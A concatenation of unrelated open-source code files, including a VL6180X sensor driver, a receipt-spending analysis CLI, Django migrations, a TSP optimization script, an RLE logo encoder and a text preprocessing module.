@n VL6180X_LEVEL_HIGH value > thresh_high
@n VL6180X_OUT_OF_WINDOW value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY new sample ready
'''
def als_config_interrupt(self,mode):
if(mode > self.VL6180X_NEW_SAMPLE_READY):
return False
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO])
value = self.__i2cbus.read_byte(self.__i2c_addr)
value = value | ( mode << 3 )
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,value])
'''
@brief Enable continuous ranging mode
'''
def range_start_continuous_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01])
time.sleep(0.3);
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x03])
'''
@brief Retrieve ranging data
    @return ranging data, unit: mm
'''
def range_get_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_RANGE_VAL>>8, [self.VL6180X_RESULT_RANGE_VAL])
value = self.__i2cbus.read_byte(self.__i2c_addr)
return value
'''
@brief Clear ranging interrupt
'''
def clear_range_interrupt(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,1])
'''
@brief Clear the ambient light interrupt
'''
def clear_als_interrupt(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,2])
'''
@brief Single measurement of ambient light
    @return the light intensity, unit: lux
'''
def als_poll_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01])
return self.als_get_measurement()
'''
@brief Obtain measured light data
    @return the light intensity, unit: lux
'''
def als_get_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_ALS_VAL>>8, [self.VL6180X_RESULT_ALS_VAL])
a = self.__i2cbus.read_byte(self.__i2c_addr)
b = self.__i2cbus.read_byte(self.__i2c_addr)
value = (a<<8) | b
result = ((0.32*100*value)/(self.__gain*self.__atime))
return result
'''
@brief Enable continuous measurement of ambient light intensity mode
'''
def als_start_continuous_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
time.sleep(1)
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x03])
'''
@brief Configure the period for measuring light intensity
@param period_ms Measurement period, in milliseconds
'''
def als_set_inter_measurement_period(self,period_ms):
if(period_ms>10):
if(period_ms<2550):
period_ms = (period_ms/10) -1
else:
period_ms = 254
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD,period_ms])
'''
@brief turn on interleaved mode
'''
def start_interleaved_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
time.sleep(1)
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x03])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x01])
'''
@brief Gets the interrupt state of the ranging
@return return status
    @n      0 : No threshold events reported
@n VL6180X_LEVEL_LOW :value < thresh_low
@n VL6180X_LEVEL_HIGH :value > thresh_high
@n VL6180X_OUT_OF_WINDOW :value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY :new sample ready
'''
def range_get_interrupt_status(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO>>8, [self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO])
result = self.__i2cbus.read_byte(self.__i2c_addr)
result = result & 0x07
return result
'''
@brief Gets the interrupt state of the measured light intensity
@return return status
    @n      0 : No threshold events reported
@n VL6180X_LEVEL_LOW :value < thresh_low
@n VL6180X_LEVEL_HIGH :value > thresh_high
@n VL6180X_OUT_OF_WINDOW :value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY :new sample ready
'''
def als_get_interrupt_status(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO>>8, [self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO])
result = self.__i2cbus.read_byte(self.__i2c_addr)
result = (result>>3) & 0x07
return result
'''
@brief turn off interleaved mode
'''
def __stop_interleave_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x00])
'''
@brief Gets validation information for range data
    @return range result status/error code
'''
def get_range_result(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_RANGE_STATUS>>8, [self.VL6180X_RESULT_RANGE_STATUS])
result = self.__i2cbus.read_byte(self.__i2c_addr)>>4
return result
'''
@brief set IIC addr
@param addr The IIC address to be modified
'''
def set_iic_addr(self,addr):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_I2C_SLAVE_DEVICE_ADDRESS>>8, [self.VL6180X_I2C_SLAVE_DEVICE_ADDRESS,addr])
self.__i2c_addr = addr
'''
@brief Initialize the sensor configuration
'''
def __init(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET>>8, [self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET])
reset = self.__i2cbus.read_byte(self.__i2c_addr)
if(reset):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x02, [0x07,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x02, [0x08,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x96,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x97,0xfd])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe3,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe4,0x04])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe5,0x02])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe6,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe7,0x03])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xf5,0x02])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xd9,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdb,0xce])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdc,0x03])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdd,0xf8])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x9f,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xa3,0x3c])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xb7,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xbb,0x3c])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xb2,0x09])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xca,0x09])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x98,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xb0,0x17])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xad,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xff,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x00,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x99,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xa6,0x1b])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xac,0x3e])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xa7,0x1f])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x30,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD,0x09])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_VHV_REPEAT_RATE>>8, [self.VL6180X_SYSRANGE_VHV_REPEAT_RATE,0xFF])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_VHV_RECALIBRATE>>8, [self.VL6180X_SYSRANGE_VHV_RECALIBRATE,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME>>8, [self.VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME,0x31])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD,0x31])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTEGRATION_PERIOD>>8, [self.VL6180X_SYSALS_INTEGRATION_PERIOD,0x63])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD>>8, [self.VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD,0x30])
self.set_als_gain(self.VL6180X_ALS_GAIN_1)
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x20])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET>>8, [self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET,0])
'''
@brief Set Range Threshold Value
@param thresholdL :Lower Threshold
@param thresholdH :Upper threshold
'''
def set_range_threshold_value(self,threshold_l,threshold_h):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_THRESH_LOW>>8, [self.VL6180X_SYSRANGE_THRESH_LOW,threshold_l])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_THRESH_HIGH>>8, [self.VL6180X_SYSRANGE_THRESH_HIGH,threshold_h])
'''
@brief Set ALS Threshold Value
@param thresholdL :Lower Threshold
@param thresholdH :Upper threshold
'''
def set_als_threshold_value(self,threshold_l,threshold_h):
value_l = int((threshold_l * self.__gain)/0.32)
value_h = int((threshold_h* self.__gain)/0.32)
    self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_THRESH_LOW>>8, [self.VL6180X_SYSALS_THRESH_LOW,(value_l>>8)&0xFF,value_l&0xFF])
    self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_THRESH_HIGH>>8, [self.VL6180X_SYSALS_THRESH_HIGH,(value_h>>8)&0xFF,value_h&0xFF])
'''
@brief Set the ALS gain
@param gain the value of gain(range 0-7)
@n 20 times gain: VL6180X_ALS_GAIN_20 = 0
@n 10 times gain: VL6180X_ALS_GAIN_10 = 1
@n 5 times gain: VL6180X_ALS_GAIN_5 = 2
@n 2.5 times gain: VL6180X_ALS_GAIN_2_5 = 3
    @n     1.67 times gain: VL6180X_ALS_GAIN_1_67      = 4
    @n     1.25 times gain: VL6180X_ALS_GAIN_1_25      = 5
@n 1 times gain: VL6180X_ALS_GAIN_1 = 6
@n 40 times gain: VL6180X_ALS_GAIN_40 = 7
    @return True: setup succeeded, False: setup failed
'''
def set_als_gain(self,gain):
if(gain>7):
return False
if(gain == self.VL6180X_ALS_GAIN_20):
self.__gain = 20
elif(gain == self.VL6180X_ALS_GAIN_10):
self.__gain = 10
elif(gain == self.VL6180X_ALS_GAIN_5):
self.__gain = 5.0
elif(gain == self.VL6180X_ALS_GAIN_2_5):
self.__gain = 2.5
elif(gain == self.VL6180X_ALS_GAIN_1_67):
self.__gain = 1.67
elif(gain == self.VL6180X_ALS_GAIN_1_25):
self.__gain = 1.25
elif(gain == self.VL6180X_ALS_GAIN_1):
self.__gain = 1.0
elif(gain == self.VL6180X_ALS_GAIN_40):
self.__gain = 40
gain =gain | 0x40
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_ANALOGUE_GAIN>>8, [self.VL6180X_SYSALS_ANALOGUE_GAIN,gain])
return True
'''
@brief get the identifier of sensor
    @return device model ID
'''
def __get_device_id(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_IDENTIFICATION_MODEL_ID>>8, [self.VL6180X_IDENTIFICATION_MODEL_ID])
id = self.__i2cbus.read_byte(self.__i2c_addr)
return id
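# Minimal usage sketch (illustrative only; the bus number and the use of polling mode are
# assumptions, not taken from this file):
#   sensor = DFRobot_VL6180X(bus=1)
#   if sensor.begin():
#       distance_mm = sensor.range_poll_measurement()   # single-shot range, unit: mm
#       lux = sensor.als_poll_measurement()             # single-shot ambient light, unit: lux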
| 1.984375 | 2 |
remaquery.py | wulffern/remaquery | 0 | 12799110 | ######################################################################
## Copyright (c) 2019 <NAME>, Norway
## ###################################################################
## Created : wulff at 2019-3-25
## ###################################################################
## The MIT License (MIT)
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
##
######################################################################
import os
import json
import sys
import collections
import datetime
import click
from collections import OrderedDict
import matplotlib.pyplot as plt
import pandas as pd
class rema:
def __init__(self,file):
with open(file,"r") as f:
jsonobj = json.load(f)
cat_fn = "categories.json"
categories = None
if(os.path.exists(cat_fn)):
with open(cat_fn,"r") as f:
categories = json.load(f)
self.categories = categories
self.obj = jsonobj
self.oformat = "str"
def printGroups(self):
groups = dict()
transactions = self.obj["TransactionsInfo"]["Transactions"]
for t in transactions:
for item in t["Receipt"]:
groups[item["ProductGroupDescription"]] = " "
self.printList(groups)
def printOrderByGroupOrCategory(self,maxcount=10,month = False,category=False,keyName=None,plot=False,quarter=False):
summary = dict()
if self.categories is None and category:
print("Could not find categories.json. Can't run this command")
transactions = self.obj["TransactionsInfo"]["Transactions"]
for t in transactions:
datestr= str(t["PurchaseDate"])
d = datetime.datetime.utcfromtimestamp(int(datestr[:-3]))
if(month):
header_key = str(d.year) + "-" + str(d.month)
elif(quarter):
header_key = str(d.year) + "-Q" + str(pd.Timestamp(d).quarter)
else:
header_key = str(d.year)
if(header_key not in summary):
summary[header_key] = dict()
for item in t["Receipt"]:
key = item["ProductGroupDescription"]
if(category and key in self.categories ):
key = self.categories[key]
# print(json.dumps(item,indent=4))
if(keyName and key == keyName):
key = item['ProductDescription']
elif(keyName):
continue
if(key in summary[header_key]):
summary[header_key][key] += item["Amount"]
else:
summary[header_key][key] = item["Amount"]
self.printTransactionSummary(summary,maxcount,plot)
def printTransactionSummary(self,summary,maxcount,plot):
data = OrderedDict()
for header_key in summary:
transactions = summary[header_key]
data[header_key] = list()
listofTuples = sorted(transactions.items() ,reverse = True, key=lambda x: x[1])
count = 0
for s in listofTuples:
if(count >= maxcount):
continue
else:
count += 1
data[header_key].append((s[1],s[0]))
if(plot):
self.plotDictWithTouple(data)
pass
else:
self.printDictWithTouple(data)
def printList(self,data):
"""Print a list of items"""
if(self.oformat == "json"):
print(json.dumps(data,indent=4))
else:
for el in data:
print(el)
def plotDictWithTouple(self,data):
"""Print ordered dictionary where each item is a (number,description) touple"""
pdata = dict()
#- Reorganize data
for key in data:
for el in data[key]:
val = el[0]
name = el[1]
if name not in pdata:
pdata[name] = dict()
pdata[name]['yval'] = list()
pdata[name]['xval'] = list()
pdata[name]['yval'].append(val)
pdata[name]['xval'].append(key)
#with plt.xkcd():
for key in pdata:
plt.plot(pdata[key]['xval'],pdata[key]['yval'],label=key)
plt.xlabel('Date [n]')
plt.ylabel("Kostnad [kr]")
plt.legend()
plt.xticks(rotation=90)
plt.savefig("plot.jpg")
#plt.xlim([datetime.date(2016, 1, 1), datetime.datetime.now()])
#plt.autoscale()
plt.show()
def printDictWithTouple(self,data):
"""Print ordered dictionary where each item is a (number,description) touple"""
if(self.oformat == "json"):
print(json.dumps(data,indent=4))
else:
for key in data:
print(str(key) + ":")
for el in data[key]:
print("\t%.1f\t%s" %(el[0],el[1]))
#----------------------------------------------------------
#- Command line interface
#----------------------------------------------------------
@click.group()
@click.argument('data', type=click.Path(exists=True))
@click.option('--json',is_flag=True,help="Set JSON as output format")
@click.pass_context
def cli(ctx,data,json):
ctx.ensure_object(dict)
#Load the file
r = rema(data)
if(json):
r.oformat = "json"
else:
r.oformat = "str"
ctx.obj['rema'] = r
@cli.command('list',help="Sum and list items")
@click.pass_context
@click.option('--maxcount',default=10,help="Number of items to list")
@click.option('--month',is_flag=True,help="Sort per month")
@click.option("--category",is_flag=True,help="Sort by categories.json file")
@click.option("--item",help="Specify a certain group or category")
@click.option("--plot",is_flag=True,help="Plot items")
@click.option('--quarter',is_flag=True,help="Sort per quarter")
def group(ctx,maxcount,month,category,item,plot,quarter):
ctx.obj['rema'].printOrderByGroupOrCategory(maxcount,month,category,item,plot,quarter)
@cli.command('listgroups',help="List all groups")
@click.pass_context
def listgroups(ctx):
ctx.obj['rema'].printGroups()
if __name__ == "__main__":
cli(obj = {}) | 1.164063 | 1 |
deployment/engine.py | cu-csc/automaton | 1 | 12799111 | """
implements the staged deployment engine which contains the logic and
order of execution
"""
class StagedDeploymentEngine(object):
def __init__(self):
raise NotImplementedError
| 1.625 | 2 |
NFCow/malls/apps.py | jojoriveraa/titulacion-NFCOW | 0 | 12799112 | from django.apps import AppConfig
class MallsConfig(AppConfig):
name = 'malls'
| 1.257813 | 1 |
prueba.py | IC-3002/ic-3002-2020ii-p2-lobo | 0 | 12799113 | <filename>prueba.py
import re
from simulated_annealing import optimizar
from dominio_tsp import DominioTSP
#from dominio_ag_tsp import DominioAGTSP
#from algoritmo_genetico import optimizar
from math import e
from time import time
"""
temperatura = 10000
enfriamiento = [0.8,0.9,0.95,0.99]
dominio = DominioTSP('datos/ciudades_cr.csv', 'Alajuela')
while(temperatura < 10000000):
for tasa in enfriamiento:
solucion,cont = optimizar(dominio,temperatura,tasa)
print("| 17 |", temperatura, "|", tasa, "|", round(solucion,3), "|", cont, "|")
temperatura = temperatura/0.2
"""
"""
poblacion = 100
elite = 0.1
mutacion = [0.1,0.3,0.5,0.7,0.9]
reps = 1000
test = False
dominio = DominioAGTSP('datos/ciudades_cr.csv', 'Alajuela')
# (dominio, 100, 0.1, 0.5, 1000, False)
#optimizar(dominio, tam_pobl, porc_elite, prob_mut, reps, testeo):
while(poblacion <= 1000):
for p in mutacion:
solucion = optimizar(dominio,poblacion,elite,p,reps,test)
#print("poblacion: ", poblacion, ", mutacion: ", p)
#print("Solucion: ", dominio.fcosto(solucion), "\n")
print("| 16 |", poblacion, "|", p, "|", round(dominio.fcosto(solucion),3), "| 1000 |")
poblacion = poblacion + 200
"""
# Annealing: 1250000.0 0.99 1762.4 1856
# Genetic: 700 0.1 1675.0 1000
# Simulated annealing
dominio = DominioTSP('datos/ciudades_cr.csv', 'Alajuela')
for i in range(0,5):
# start_time = time()
solucion = optimizar(dominio,1250000.0,0.99)
# elapsed_time = time() - start_time
#print("Elapsed time: %0.10f seconds." % elapsed_time)
print (solucion)
# Genetic algorithm
"""
dominio = DominioAGTSP('datos/ciudades_cr.csv', 'Alajuela')
for i in range(0,5):
start_time = time()
solucion = optimizar(dominio,700,0.1,0.1,1000,False)
elapsed_time = time() - start_time
print("Elapsed time: %0.10f seconds." % elapsed_time)
print (dominio.fcosto(solucion))
"""
| 2.765625 | 3 |
indumpco/file_format.py | ncleaton/indumpco | 0 | 12799114 | <filename>indumpco/file_format.py<gh_stars>0
# -*- coding: utf-8 -*-
import zlib
import lzma
import re
import os
class FormatError(Exception):
pass
def pack_idxline(seg_len, seg_sum):
return "%d %s\n" % (int(seg_len), seg_sum)
def unpack_idxline(idxline):
hit = re.match(r'^([0-9]+) (\w+)\s*$', idxline)
if not hit:
raise FormatError("malformed index line", idxline)
seg_len = int(hit.group(1))
seg_sum = hit.group(2)
return seg_len, seg_sum
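# Round-trip example of the index-line format handled above (illustrative values):
#   pack_idxline(4096, "d41d8cd9")     -> "4096 d41d8cd9\n"
#   unpack_idxline("4096 d41d8cd9\n")  -> (4096, "d41d8cd9")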
class BlockFileRead(object):
def __init__(self, seg_sum, filename):
self.main_seg_sum = seg_sum
self.filename = filename
self.fh = open(filename)
self.format_byte = self.fh.read(1)
self.extra_idxlines = set()
if self.format_byte == 'z':
self.is_x_group = False
elif self.format_byte == 'x':
self.is_x_group = True
self.x_overall_sum = self.fh.readline().strip()
embedded_idxline_count = int(self.fh.readline().strip())
self.x_embedded_idxlines = []
self.x_overall_len = 0
for _ in range(embedded_idxline_count):
idxline = self.fh.readline()
self.x_embedded_idxlines.append(idxline)
xseglen, xsegsum = unpack_idxline(idxline)
self.x_overall_len += xseglen
if xsegsum != self.main_seg_sum:
self.extra_idxlines.add(idxline)
self.x_overall_idxline = pack_idxline(self.x_overall_len, self.x_overall_sum)
if self.main_seg_sum != self.x_overall_sum:
self.extra_idxlines.add(self.x_overall_idxline)
else:
raise FormatError("invalid first byte of compressed block", (self.blk_file, format_byte))
def x_unpack_segs(self, desired_idxline_set):
xz_data = self.fh.read()
unpacked_data = lzma.decompress(xz_data)
if self.x_overall_idxline in desired_idxline_set:
yield (self.x_overall_idxline, unpacked_data)
offset = 0
for idxline in self.x_embedded_idxlines:
xseglen, xsegsum = unpack_idxline(idxline)
if idxline in desired_idxline_set:
yield (idxline, unpacked_data[offset:offset+xseglen])
offset += xseglen
if offset != len(unpacked_data):
raise FormatError("lzma data len not consistent with seg lens in x header", self.filename)
def z_unpack_seg(self):
return zlib.decompress(self.fh.read())
class BlockDirBase(object):
def __init__(self, dirname):
self.dirname = dirname
class FlatBlockDir(BlockDirBase):
def filename(self, seg_sum):
return os.path.join(self.dirname, seg_sum)
class Nest1BlockDir(BlockDirBase):
def filename(self, seg_sum):
return os.path.join(self.dirname, os.path.join(seg_sum[0], seg_sum))
def BlockDir(dirname):
if os.path.exists(os.path.join(dirname, "0")):
return Nest1BlockDir(dirname)
else:
return FlatBlockDir(dirname)
class BlockSearchPath(object):
def __init__(self, dirnames):
self.block_dirs = [BlockDir(d) for d in dirnames]
def find_block(self, seg_sum):
for bd in self.block_dirs:
f = bd.filename(seg_sum)
if os.path.exists(f):
return f
return None
def compress_string_to_zfile(src_str, dest_file):
f = open(dest_file, 'w')
f.write('z')
f.write(zlib.compress(src_str, 9))
f.close()
def decompress_zfile_to_string(src_file):
f = open(src_file)
formatbyte = f.read(1)
if formatbyte != 'z':
raise FormatError("blockfile is not a zlib file", (src_file, formatbyte))
return zlib.decompress(f.read())
| 2.578125 | 3 |
venv/lib/python3.6/site-packages/pylint/test/functional/too_many_lines.py | aitoehigie/britecore_flask | 0 | 12799115 | # pylint: disable=missing-docstring
# -1: [too-many-lines]
__revision__ = 0
ZERFZAER = 3
HEHEHE = 2
| 1.054688 | 1 |
UserProfiles/migrations/0006_auto_20180812_2236.py | Milo-Goodfellow-Work/GuildsDevelopmentBuild | 0 | 12799116 | # Generated by Django 2.0.7 on 2018-08-12 22:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('UserProfiles', '0005_auto_20180808_2150'),
]
operations = [
migrations.AlterField(
model_name='userprofilemodel',
name='UserProfileBio',
field=models.TextField(blank=True, max_length=300, null=True),
),
migrations.AlterField(
model_name='userprofilemodel',
name='UserProfileHeader',
field=models.ImageField(default='UserProfiles/Defaults/BlankWhite.png', upload_to='UserProfiles/'),
),
migrations.AlterField(
model_name='userprofilemodel',
name='UserProfileImage',
field=models.ImageField(default='UserProfiles/Defaults/Blank.png', upload_to='UserProfiles/'),
),
]
| 1.617188 | 2 |
rle.py | ashkitten/dosdvd | 5 | 12799117 | <gh_stars>1-10
def rle():
with open("logo.ascii") as fp:
logo = fp.read().split("\n")[:-1]
# simple row based rle
bits = 5
cur = "."
run = 0
buf = list()
for row in logo:
for c in row:
if c == cur:
run += 1
else:
cur = c
buf += [run]
run = 1
if run > 2 ** bits - 1:
buf += [2 ** bits - 1]
buf += [0]
run = run - 2 ** bits + 1
# we don't need to append the last run if it's a run of 0's
if cur != ".":
buf += [run]
# iterator to split off the data into chunks
def chunks(l, n):
ret = list()
for b in l:
ret += [b]
if len(ret) == n:
yield ret
ret = list()
if len(ret) == 0: return
while len(ret) % n != 0:
ret += [0]
yield ret
buf2 = list()
for b in chunks(buf, 3):
i = b[0] | b[1] << 5 | b[2] << 10 | 1 << 15
buf2 += [i & 0xff, i >> 8 & 0xff]
return (len(logo[0]), len(logo), buf2)
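# Decoding sketch (an added illustration, not part of the original tool): each byte pair emitted
# above packs three 5-bit run lengths plus a marker bit, and can be unpacked like this.
def unpack_word(lo, hi):
    word = lo | hi << 8
    # Drop the 1 << 15 marker bit and extract the three 5-bit fields packed by rle().
    return (word & 0x1f, (word >> 5) & 0x1f, (word >> 10) & 0x1f)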
if __name__ == "__main__":
(width, height, buf) = rle()
# print it as a nasm data directive
print("logo_width equ", width)
print("logo_height equ", height)
print("db " + ", ".join(map(str, buf)))
| 3.140625 | 3 |
microbenchmarks/oldstyle_iteration.py | aisk/pyston | 1 | 12799118 | class C:
def __init__(self):
self.l = range(10)
def __getitem__(self, idx):
return self.l[idx]
def f():
c = C()
total = 0
for _ in xrange(100000):
for i in c:
total += i
print total
f()
| 3.109375 | 3 |
textpreprocess.py | skbly7/usefulness | 0 | 12799119 | #!/usr/bin/python
import html2text
#import tokenizer
from nltk.tokenize import MWETokenizer as tokenizer
import nltk
#from nltk import word_tokenize
from nltk.tokenize import WordPunctTokenizer # This is better for sentences containing unicode, like: u"N\u00faria Espert"
word_tokenize = WordPunctTokenizer().tokenize
#from nltk.corpus import stopwords
# Use the PyStemmer stemmer, since it is written in C and is thus much faster than the NLTK porter stemmer
import Stemmer
#from nltk.stem.porter import PorterStemmer
import os.path
import re
import string
STOPFILE = os.path.join(os.path.abspath(os.path.dirname(os.path.realpath(__file__))), "english.stop")
stoplist = None
_wsre = re.compile("\s+")
_alphanumre = re.compile("[\w\-\' ]", re.UNICODE)
